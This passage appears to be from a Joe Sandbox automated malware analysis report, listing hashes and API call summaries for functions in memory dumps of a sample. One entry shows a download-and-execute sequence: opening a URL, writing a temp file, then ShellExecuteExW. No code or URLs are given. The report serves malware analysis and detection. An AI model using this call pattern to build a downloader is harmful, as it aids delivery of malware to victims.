                                                                            • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                            • Instruction Fuzzy Hash: B5319139A843099FEB26AF38E845B56B7E9BF20311F30846DE458D7260DF31E951CB94
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                            • Instruction ID: 1e1df55711acecdaceb3f6a2bcf6b580ecd3898991ab0d8f2f462f5a0a61d494
                                                                            • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                            • Instruction Fuzzy Hash: 75C174B2D40205BBEB20DBA8CC43FEB77B8AB0C705F15515AFA05FB286D6B49D418B54
                                                                            APIs
                                                                            • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02192C74
                                                                            • InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 02192C8A
                                                                            • GetTempPathW.KERNEL32(00000105,?), ref: 02192CA6
                                                                            • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02192CBC
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02192CF5
                                                                            • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02192D31
                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02192D4E
                                                                            • ShellExecuteExW.SHELL32(?), ref: 02192DC5
                                                                            • WaitForSingleObject.KERNEL32(?,00008000), ref: 02192DDA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                            • String ID: <
                                                                            • API String ID: 838076374-4251816714
                                                                            • Opcode ID: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
                                                                            • Instruction ID: fbfa7fd2a4b9e57cb2f31cda874ae8830ba0969f62e41aa5b503e0809e9907ee
                                                                            • Opcode Fuzzy Hash: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
                                                                            • Instruction Fuzzy Hash: 0E414DB594021DAFEB209F649C85FEAB7FCFF05745F0080E6A549E2150DB709E898FA4
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,021AF218,00000004,021A7D77,00000004,021A8059), ref: 021AEEE9
                                                                            • GetLastError.KERNEL32(?,021AF218,00000004,021A7D77,00000004,021A8059,?,021A8789,?,00000008,021A7FFD,00000000,?,?,00000000,?), ref: 021AEEF5
                                                                            • LoadLibraryW.KERNEL32(advapi32.dll,?,021AF218,00000004,021A7D77,00000004,021A8059,?,021A8789,?,00000008,021A7FFD,00000000,?,?,00000000), ref: 021AEF05
                                                                            • GetProcAddress.KERNEL32(00000000,00447430), ref: 021AEF1B
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 021AEF31
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 021AEF48
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 021AEF5F
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 021AEF76
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 021AEF8D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                            • String ID: advapi32.dll
                                                                            • API String ID: 2340687224-4050573280
                                                                            • Opcode ID: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
                                                                            • Instruction ID: f884b798268fd5d599b5012cf9a7ef73b8568d60fcad5886303fa57976a3548e
                                                                            • Opcode Fuzzy Hash: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
                                                                            • Instruction Fuzzy Hash: 2D215EB5944750BFEB106FB49C08B5ABFA8EF05B16F104A2AF542D3651CB7CD4408FA8
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,021AF218,00000004,021A7D77,00000004,021A8059), ref: 021AEEE9
                                                                            • GetLastError.KERNEL32(?,021AF218,00000004,021A7D77,00000004,021A8059,?,021A8789,?,00000008,021A7FFD,00000000,?,?,00000000,?), ref: 021AEEF5
                                                                            • LoadLibraryW.KERNEL32(advapi32.dll,?,021AF218,00000004,021A7D77,00000004,021A8059,?,021A8789,?,00000008,021A7FFD,00000000,?,?,00000000), ref: 021AEF05
                                                                            • GetProcAddress.KERNEL32(00000000,00447430), ref: 021AEF1B
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 021AEF31
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 021AEF48
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 021AEF5F
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 021AEF76
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 021AEF8D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                            • String ID: advapi32.dll
                                                                            • API String ID: 2340687224-4050573280
                                                                            • Opcode ID: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
                                                                            • Instruction ID: e38a2a4b15e56a1d309e4e5d361195ff6614eac76ab8d845f3b368c46e2ccccb
                                                                            • Opcode Fuzzy Hash: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
                                                                            • Instruction Fuzzy Hash: DD215EB5944750BFE7106FA49C08B5ABFACEF05B16F104A2AF541D3651CB7CD4408BA8
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021A66FB), ref: 021A24A6
                                                                            • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021A24B4
                                                                            • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021A24C2
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021A66FB), ref: 021A24F0
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 021A24F7
                                                                            • GetLastError.KERNEL32(?,?,?,021A66FB), ref: 021A2512
                                                                            • GetLastError.KERNEL32(?,?,?,021A66FB), ref: 021A251E
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021A2534
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021A2542
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                            • String ID: kernel32.dll
                                                                            • API String ID: 4179531150-1793498882
                                                                            • Opcode ID: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                                            • Instruction ID: f1f0b5e0fb8c9b6b631e22b16a28ea4890168a9a746239411aa4a001e522f9ec
                                                                            • Opcode Fuzzy Hash: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                                            • Instruction Fuzzy Hash: 7C11A5799403107FE7117F756C79AAB3BACAD01B127200536FC02D3152EB78D5008A6C
                                                                            APIs
                                                                            • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424856
                                                                              • Part of subcall function 00424B25: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424589), ref: 00424B35
                                                                            • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042486B
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042487A
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00424888
                                                                            • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 004248FE
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042493E
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0042494C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                            • String ID: pContext$switchState
                                                                            • API String ID: 3151764488-2660820399
                                                                            • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                            • Instruction ID: ac479dc220ac8c4341dea52746a205dfcc737ca8ea5a0b270bd9d9db7e88fe8b
                                                                            • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                            • Instruction Fuzzy Hash: F7312835B002249BCF04EF65D881A6E73B5FF84314FA1456BE915A7382DB78EE05C798
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419758
                                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419762
                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 00419769
                                                                            • SafeRWList.LIBCONCRT ref: 00419788
                                                                              • Part of subcall function 00417757: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417768
                                                                              • Part of subcall function 00417757: List.LIBCMT ref: 00417772
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041979A
                                                                            • GetLastError.KERNEL32 ref: 004197A9
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197BF
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004197CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                            • String ID: eventObject
                                                                            • API String ID: 1999291547-1680012138
                                                                            • Opcode ID: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                                            • Instruction ID: beae42e10eedb78f2922afb802a2acb8663f7a2576d102abe215b1da82e9749d
                                                                            • Opcode Fuzzy Hash: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                                            • Instruction Fuzzy Hash: 4C11AC75500204EACB14EFA4CC4AFEE77B8AF00701F20413BF41AE21D1EB789E88866D
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 021B0C26
                                                                            • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 021B0C8D
                                                                            • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 021B0CAA
                                                                            • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 021B0D10
                                                                            • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 021B0D25
                                                                            • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 021B0D37
                                                                            • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 021B0D65
                                                                            • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 021B0D70
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021B0D9C
                                                                            • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 021B0DAC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                            • String ID:
                                                                            • API String ID: 3720063390-0
                                                                            • Opcode ID: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
                                                                            • Instruction ID: ef3dd7cb8c3950f1665b3797b85d8652904d81ab30dc0ec24374fc575ce60790
                                                                            • Opcode Fuzzy Hash: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
                                                                            • Instruction Fuzzy Hash: 0341B534A842489FCF16FFB4C4647EE77B66F09304F0440A9D95A6B2C2CB765A06CF61
                                                                            APIs
                                                                            • _free.LIBCMT ref: 00431DEA
                                                                              • Part of subcall function 0043345A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                              • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                            • _free.LIBCMT ref: 00431DF6
                                                                            • _free.LIBCMT ref: 00431E01
                                                                            • _free.LIBCMT ref: 00431E0C
                                                                            • _free.LIBCMT ref: 00431E17
                                                                            • _free.LIBCMT ref: 00431E22
                                                                            • _free.LIBCMT ref: 00431E2D
                                                                            • _free.LIBCMT ref: 00431E38
                                                                            • _free.LIBCMT ref: 00431E43
                                                                            • _free.LIBCMT ref: 00431E51
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                            • Instruction ID: 87776794b7e7eece0f25d73b1b75ae69850b50dc626e3fc0762df5fa29964573
                                                                            • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                            • Instruction Fuzzy Hash: 9011A776500108BFDB02EF55C852CD93B65EF18356F0190AAF9184B232DA35DF519F88
                                                                            APIs
                                                                            • _free.LIBCMT ref: 021C2051
                                                                              • Part of subcall function 021C36C1: HeapFree.KERNEL32(00000000,00000000,?,021CA34F,?,00000000,?,00000000,?,021CA5F3,?,00000007,?,?,021CA9E7,?), ref: 021C36D7
                                                                              • Part of subcall function 021C36C1: GetLastError.KERNEL32(?,?,021CA34F,?,00000000,?,00000000,?,021CA5F3,?,00000007,?,?,021CA9E7,?,?), ref: 021C36E9
                                                                            • _free.LIBCMT ref: 021C205D
                                                                            • _free.LIBCMT ref: 021C2068
                                                                            • _free.LIBCMT ref: 021C2073
                                                                            • _free.LIBCMT ref: 021C207E
                                                                            • _free.LIBCMT ref: 021C2089
                                                                            • _free.LIBCMT ref: 021C2094
                                                                            • _free.LIBCMT ref: 021C209F
                                                                            • _free.LIBCMT ref: 021C20AA
                                                                            • _free.LIBCMT ref: 021C20B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                            • Instruction ID: 38b84812fa31d3d47c243e0b08a887de850774347e9271ff99ea4f3f75087352
                                                                            • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                            • Instruction Fuzzy Hash: 6711407A990118BFCB01EF94D941DD93FA6EF14350B6185A9BA188B271DB31EB609FC0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe
                                                                            • String ID: <(@$<(@
                                                                            • API String ID: 4189289331-1745028333
                                                                            • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                            • Instruction ID: dd19a4b5401c40ac365bd4b6466f4abdac11a3aecfb9adebaa38ddcec4c103bf
                                                                            • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                            • Instruction Fuzzy Hash: 18512C32A00111EBDB149B5BEC41EAB77ADEF49325F90415FF81592282DB39D900866D
                                                                            APIs
                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044017F), ref: 0043EEB5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: DecodePointer
                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                            • API String ID: 3527080286-3064271455
                                                                            • Opcode ID: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
                                                                            • Instruction ID: 29b0adf4cd4a19bf6d80e559d7e92663f8e6ec8767138eee3bf00a563bc4ae44
                                                                            • Opcode Fuzzy Hash: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
                                                                            • Instruction Fuzzy Hash: 4851A07090150ADBCF14DFA9E9481AEBBB0FB0D300F2551A7D480A62A5C7B99D29CB1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                            • Instruction ID: c2113c7b99cd4a73f96cf38b0b2848bfdd9725dc22f2abef0d40eb0931024e1b
                                                                            • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                            • Instruction Fuzzy Hash: AEC1E478D84349AFCB12DF98D844BEEBBB1AF19314F24809DE825A7392C7719941CF61
                                                                            APIs
                                                                            • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D00
                                                                            • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D19
                                                                            • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D20
                                                                            • PMDtoOffset.LIBCMT ref: 00428D3F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: FindInstanceTargetType$Offset
                                                                            • String ID: Bad dynamic_cast!
                                                                            • API String ID: 1467055271-2956939130
                                                                            • Opcode ID: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
                                                                            • Instruction ID: f58e39392761fe45c588d51cd7f0347041c183eb1b6093b38bd943e8a3a40f23
                                                                            • Opcode Fuzzy Hash: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
                                                                            • Instruction Fuzzy Hash: 16214972B022259FDB04DF65FD02AAE77A4EF54714B50411FF900932C1DF38E90586A9
                                                                            APIs
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00405575
                                                                            • int.LIBCPMT ref: 0040558C
                                                                              • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                              • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                            • std::locale::_Getfacet.LIBCPMT ref: 00405595
                                                                            • std::_Facet_Register.LIBCPMT ref: 004055C6
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004055DC
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004055FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                            • String ID: h'u
                                                                            • API String ID: 2243866535-1127183452
                                                                            • Opcode ID: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
                                                                            • Instruction ID: 4f98c6a968a786bbabe9cf8dd1bd77c0c3f582db622070c6a9572df94363bb86
                                                                            • Opcode Fuzzy Hash: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
                                                                            • Instruction Fuzzy Hash: B111A371900524ABCB14EBA1CC41AAE7770AF54315F20003FF812BB2D2DB7C9A05CB9C
                                                                            APIs
                                                                            • atomic_compare_exchange.LIBCONCRT ref: 021AC6CC
                                                                            • atomic_compare_exchange.LIBCONCRT ref: 021AC6F0
                                                                            • std::_Cnd_initX.LIBCPMT ref: 021AC701
                                                                            • std::_Cnd_initX.LIBCPMT ref: 021AC70F
                                                                              • Part of subcall function 02191370: __Mtx_unlock.LIBCPMT ref: 02191377
                                                                            • std::_Cnd_initX.LIBCPMT ref: 021AC71F
                                                                              • Part of subcall function 021AC3DF: __Cnd_broadcast.LIBCPMT ref: 021AC3E6
                                                                            • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 021AC72D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                            • String ID: d#D
                                                                            • API String ID: 4258476935-2139572230
                                                                            • Opcode ID: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
                                                                            • Instruction ID: 24abe5dd501e2f66e8d354a2f34ed93909e75ab58dd28904620c932c1b40e184
                                                                            • Opcode Fuzzy Hash: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
                                                                            • Instruction Fuzzy Hash: DB01A779981605BFDF21FB708D55B9E736BBF04360F140011E90597680EBB4EB158ED1
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D928,0042D928,?,?,?,00432375,00000001,00000001,23E85006), ref: 0043217E
                                                                            • __alloca_probe_16.LIBCMT ref: 004321B6
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432375,00000001,00000001,23E85006,?,?,?), ref: 00432204
                                                                            • __alloca_probe_16.LIBCMT ref: 0043229B
                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004322FE
                                                                            • __freea.LIBCMT ref: 0043230B
                                                                              • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                            • __freea.LIBCMT ref: 00432314
                                                                            • __freea.LIBCMT ref: 00432339
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 3864826663-0
                                                                            • Opcode ID: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                                            • Instruction ID: ba832ad7ebe863b589d8a86c2aeb799e0d63014e0688505fe86a97fbdbb1aa79
                                                                            • Opcode Fuzzy Hash: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                                            • Instruction Fuzzy Hash: DA51F572600216AFDB249F71DD41EAF77A9EB48754F14462AFD04E7240DBBCDC408668
                                                                            APIs
                                                                              • Part of subcall function 021C2131: GetLastError.KERNEL32(?,?,021BA9DC,?,00000000,?,021BCDD6,02192474,00000000,?,00451F20), ref: 021C2135
                                                                              • Part of subcall function 021C2131: _free.LIBCMT ref: 021C2168
                                                                              • Part of subcall function 021C2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021C21A9
                                                                            • _free.LIBCMT ref: 021C1434
                                                                            • _free.LIBCMT ref: 021C144D
                                                                            • _free.LIBCMT ref: 021C147F
                                                                            • _free.LIBCMT ref: 021C1488
                                                                            • _free.LIBCMT ref: 021C1494
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$ErrorLast
                                                                            • String ID: C
                                                                            • API String ID: 3291180501-1037565863
                                                                            • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                            • Instruction ID: f56e173f157345e806e719260d6fe3115db2ff6b61b1dcd9572feab27b0b76ba
                                                                            • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                            • Instruction Fuzzy Hash: 42B11A79981219AFDB24DF18C884BADB7B5FF58314F2045AED909A7351D730AE90CF80
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
